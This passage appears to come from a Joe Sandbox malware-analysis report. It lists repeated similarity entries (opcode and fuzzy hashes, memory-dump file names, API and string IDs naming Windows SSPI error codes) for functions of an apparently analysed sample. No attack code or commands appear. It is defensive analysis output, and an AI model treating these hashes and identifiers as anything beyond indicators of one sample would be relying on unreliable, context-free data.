                            • Opcode ID: e4f15aedf80c7c131c9545047d0943edaa8e4f7cc9274c87a88210dcde743aee
                            • Instruction ID: cc381dcab06026362cfa6a8b07e1cd8a45ea5d8071c8e501ee4adf22d6245aa9
                            • Opcode Fuzzy Hash: e4f15aedf80c7c131c9545047d0943edaa8e4f7cc9274c87a88210dcde743aee
                            • Instruction Fuzzy Hash: 89116022618A4285E7A8FF10A0402EDA375FF88741FC14036D99E027D6DFBCD445C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_POLICY_NLTM_ONLY
                            • API String ID: 1435330505-2604752562
                            • Opcode ID: 79b381ddf5f17da8cfd930ab5201a775a187c5eb0d25baf50fd767419ce7d404
                            • Instruction ID: af02a6524330fd2542ce5e92d0d2f2bc14c8851ff9e92f091119d5bf813136a5
                            • Opcode Fuzzy Hash: 79b381ddf5f17da8cfd930ab5201a775a187c5eb0d25baf50fd767419ce7d404
                            • Instruction Fuzzy Hash: 21118222618A4286E768FF10A0402FDA375FF88781FC14036D99E027D6DFBCD445C7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_REVOCATION_OFFLINE_C
                            • API String ID: 1435330505-3434868068
                            • Opcode ID: 417c1251e3616ffe4df876f11a2543a97fb2ccc6a709b5a35591957fbf67e140
                            • Instruction ID: 6349dfd4431f52930eefd44df78af85970f30c312a9e9b0d5ae93830ab11ac3f
                            • Opcode Fuzzy Hash: 417c1251e3616ffe4df876f11a2543a97fb2ccc6a709b5a35591957fbf67e140
                            • Instruction Fuzzy Hash: 32118222618A4285E769FF10A0442FDA375FF88741FC14036D99E027D6DFBCD445C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_QOP_NOT_SUPPORTED
                            • API String ID: 1435330505-2000925551
                            • Opcode ID: e056cf3e6dc9e0495b083fa39f9abda904dc560eeaad2d8842722b571ae5303d
                            • Instruction ID: 731ef06be373b900265c9e9375d5da32816380e6363929fb4e2f2d049a289fb9
                            • Opcode Fuzzy Hash: e056cf3e6dc9e0495b083fa39f9abda904dc560eeaad2d8842722b571ae5303d
                            • Instruction Fuzzy Hash: BD118222618A4285E768FF10A0402FDA375FF88741FC14036D99E027D6DFBCD445C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_PKINIT_CLIENT_FAILURE
                            • API String ID: 1435330505-751537933
                            • Opcode ID: 1627c26d4eb300424a7047a3f50406876f7c33a145d383bd92fc89cb502bb4a8
                            • Instruction ID: b4f2e0daee53d42b7926f4d35c95b80ddd900e3f94c1de2ba2e74dc455326a6c
                            • Opcode Fuzzy Hash: 1627c26d4eb300424a7047a3f50406876f7c33a145d383bd92fc89cb502bb4a8
                            • Instruction Fuzzy Hash: E0118222618A4285E768FF10A0402FDA375FF88741FC14036D99E027D6DFBCE445C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_OUT_OF_SEQUENCE
                            • API String ID: 1435330505-3748170351
                            • Opcode ID: 97b03c64a3621921bd8a0e35a025e05ffb63e5522aa64c2c152ae1966e264eb6
                            • Instruction ID: b701ffad2fdcaab946ec5774937325061c4e99210c831194c98141bc27680722
                            • Opcode Fuzzy Hash: 97b03c64a3621921bd8a0e35a025e05ffb63e5522aa64c2c152ae1966e264eb6
                            • Instruction Fuzzy Hash: 0E116D22618A4285E7A8FF10A0402FDA375FF88781FC14036D9AE027D6DFBCD845C7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_PKINIT_NAME_MISMATCH
                            • API String ID: 1435330505-150002090
                            • Opcode ID: f38405e0da77630303fafb2dff8b3ccb76a48b2bc13f3757ad187b8bdde8741f
                            • Instruction ID: 6c8b046b6fd84802af18bb18c6b15cf97c3ac016301b093c110797952f043109
                            • Opcode Fuzzy Hash: f38405e0da77630303fafb2dff8b3ccb76a48b2bc13f3757ad187b8bdde8741f
                            • Instruction Fuzzy Hash: D1118222618A4285E768FF10A0402FDA375FF88741FC14036D99E027D6DFBCD445C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_NO_S4U_PROT_SUPPORT
                            • API String ID: 1435330505-839832400
                            • Opcode ID: 1a61c974587919529a56b9ba9e972241c3deb2df1046477ba5706b0306396755
                            • Instruction ID: 2e35567f77961f51cfca772aa43ead4000879fedc793481823fd42156ddca760
                            • Opcode Fuzzy Hash: 1a61c974587919529a56b9ba9e972241c3deb2df1046477ba5706b0306396755
                            • Instruction Fuzzy Hash: B3116D22618B4285E7A8FF10A0402EDA375FF88781FC14036D9AE027D6DFBCD845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_NO_TGT_REPLY
                            • API String ID: 1435330505-2640736245
                            • Opcode ID: 5cce48d33509d81210e853d872af67352e315a3b75540eba7f338ed2bef99aeb
                            • Instruction ID: e7f25da1315363e68db119423f40b2659908fd0e6549f4f2b2f37009c41ac775
                            • Opcode Fuzzy Hash: 5cce48d33509d81210e853d872af67352e315a3b75540eba7f338ed2bef99aeb
                            • Instruction Fuzzy Hash: 02116D26618A4285E7A8FF10A0402EDA375FF88781FC14036D9AE027D6DFBCD845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_NO_IP_ADDRESSES
                            • API String ID: 1435330505-2704457502
                            • Opcode ID: e235f45c3e229ece7590dd75cafce70d832f86bc2ff7804f97a7be30f0d2bc89
                            • Instruction ID: abf7247bef9bc0ca04e80142e54c739f58895aededdcf87667c66399efa5f9dc
                            • Opcode Fuzzy Hash: e235f45c3e229ece7590dd75cafce70d832f86bc2ff7804f97a7be30f0d2bc89
                            • Instruction Fuzzy Hash: 11116D22618A4285E7A9FF10A0402FDA375FF88781FC14036D9AE027D6DFBCD845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_NO_PA_DATA
                            • API String ID: 1435330505-2211492245
                            • Opcode ID: 353f13fe14f87235a997bad30c687cde4c67812a9ff5a832dee23c336d2a1b18
                            • Instruction ID: 67d7a6a2824a4b4529c94db4da185fd26606b294310fe735816521a27b7816dc
                            • Opcode Fuzzy Hash: 353f13fe14f87235a997bad30c687cde4c67812a9ff5a832dee23c336d2a1b18
                            • Instruction Fuzzy Hash: 2A116D22618A4285E7A8FF10A0402EDA375FF88781FC14036D9AE027D6DFBCD845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_NO_KERB_KEY
                            • API String ID: 1435330505-1707302738
                            • Opcode ID: 63f6afb085b1445b8bd16bc8abab2ff036b0227d7b105ce9a078973c1f8a3f0c
                            • Instruction ID: 56acae1897592d54884442b758e5a70c8d82fc4d57ba6cd3d5a6c40ad6b3a637
                            • Opcode Fuzzy Hash: 63f6afb085b1445b8bd16bc8abab2ff036b0227d7b105ce9a078973c1f8a3f0c
                            • Instruction Fuzzy Hash: 8E116D22618A4285E7A8FF10A0402EDA375FF88781FC14036D9AE027D6DFBCD845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_NO_CREDENTIALS
                            • API String ID: 1435330505-2672095485
                            • Opcode ID: bdc16241a4db5473303296a4d2af5f3dfd6d169c0f16b074dbce383baa27d7c0
                            • Instruction ID: d1a3efa43fe5dccaa4927f202fefae073089eba7aa7dad516ae0c5df2b297578
                            • Opcode Fuzzy Hash: bdc16241a4db5473303296a4d2af5f3dfd6d169c0f16b074dbce383baa27d7c0
                            • Instruction Fuzzy Hash: 2C116D22618A4285E7A8FF10A0402EDA375FF88781FC14036D9AE027D6DFBCD845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_NO_AUTHENTICATING_AUTHORITY
                            • API String ID: 1435330505-3294358665
                            • Opcode ID: 29aaa159e840c9834c68c2cfa6ff841cbdd10aca7092468762173caa3d137782
                            • Instruction ID: d89787e89a47315f25042d2ac93d66c43b1b77e9105ffd8f0cc78ec9e5eac1ea
                            • Opcode Fuzzy Hash: 29aaa159e840c9834c68c2cfa6ff841cbdd10aca7092468762173caa3d137782
                            • Instruction Fuzzy Hash: 07116D22618A4285E7A8FF10A0402EDA375FF88781FC14036D9AE027D6DFBCD845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_NO_IMPERSONATION
                            • API String ID: 1435330505-480010766
                            • Opcode ID: 2e46b5d00165c9c9defe6e3bde39fddb1a5eac614a589c9d357c6a2cc8d9bd36
                            • Instruction ID: ba1fea7a9bfcf056c4445c554b8106e98851d5d887008616601c12bd3a06e1e6
                            • Opcode Fuzzy Hash: 2e46b5d00165c9c9defe6e3bde39fddb1a5eac614a589c9d357c6a2cc8d9bd36
                            • Instruction Fuzzy Hash: 91116D26618A4285E7A9FF10A0442EDA375FF88781FC14036D9AE027D6DFBCD845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_MUST_BE_KDC
                            • API String ID: 1435330505-421735889
                            • Opcode ID: 9ae41c34381301365762b6a9648815fcdf839abd08a5db5f03464133a66dd26b
                            • Instruction ID: a0538669141035124c2471b0c2dc6a0b6e8f915b1cbd6cfbaacc4a9be6ed5c62
                            • Opcode Fuzzy Hash: 9ae41c34381301365762b6a9648815fcdf839abd08a5db5f03464133a66dd26b
                            • Instruction Fuzzy Hash: A6118F26618A4285E7A8FF10A0402FDA375FF88781FC14036D9AE027D6DFBCD845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_NOT_OWNER
                            • API String ID: 1435330505-85178166
                            • Opcode ID: 7d8399ce0817d309106f839ca88abca59d46daa6eab85881ad7cab29fdf35604
                            • Instruction ID: f46831ab0227906e0dbf3d4582cf152a1e6f1a862ff735d6eec363113000efb6
                            • Opcode Fuzzy Hash: 7d8399ce0817d309106f839ca88abca59d46daa6eab85881ad7cab29fdf35604
                            • Instruction Fuzzy Hash: 26116D22618A4285E7A8FF10A0402EDA375FF88781FC14036D9AE027D6DFBCE845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_MAX_REFERRALS_EXCEEDED
                            • API String ID: 1435330505-2208301713
                            • Opcode ID: 6b8486946659c8238f8ca053dcc9d18e3f13eeea38739b9ff9d4a0ceccabc4f4
                            • Instruction ID: afe88f923208ac113ecc5b73f8d9d3cffd8f308a1600b4289da6d7d2ccf139cf
                            • Opcode Fuzzy Hash: 6b8486946659c8238f8ca053dcc9d18e3f13eeea38739b9ff9d4a0ceccabc4f4
                            • Instruction Fuzzy Hash: 8A118F26618A4285E7A8FF10A0442FDA375FF88781FC14036D9AE027D6DFBCD845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_MULTIPLE_ACCOUNTS
                            • API String ID: 1435330505-531237286
                            • Opcode ID: 88cc65a7bc263d0da757b9c16bc81612ee8c4f3d4b062dc1a3e0aba14bf6eee3
                            • Instruction ID: cf095a041c68abe514af09a353424450530b0dfc0793636497cda718e5644259
                            • Opcode Fuzzy Hash: 88cc65a7bc263d0da757b9c16bc81612ee8c4f3d4b062dc1a3e0aba14bf6eee3
                            • Instruction Fuzzy Hash: 0F118F26618A4285E7A8FF10A0402FDA375FF88781FC14036D9AE027D6DFBCD845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_MESSAGE_ALTERED
                            • API String ID: 1435330505-4174774321
                            • Opcode ID: c2e9f8d4970fe8280d0de53a0b398aaf4d994befed7486f487b87f83eafbc6c9
                            • Instruction ID: 2ccf0b924489bb422b22457a794641f7b1fa088baf2ae0b781614635b0f712b2
                            • Opcode Fuzzy Hash: c2e9f8d4970fe8280d0de53a0b398aaf4d994befed7486f487b87f83eafbc6c9
                            • Instruction Fuzzy Hash: 52118F26618A4285E7A8FF10A0402FDA375FF88781FC14036D9AE027D6DFBCD845C7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
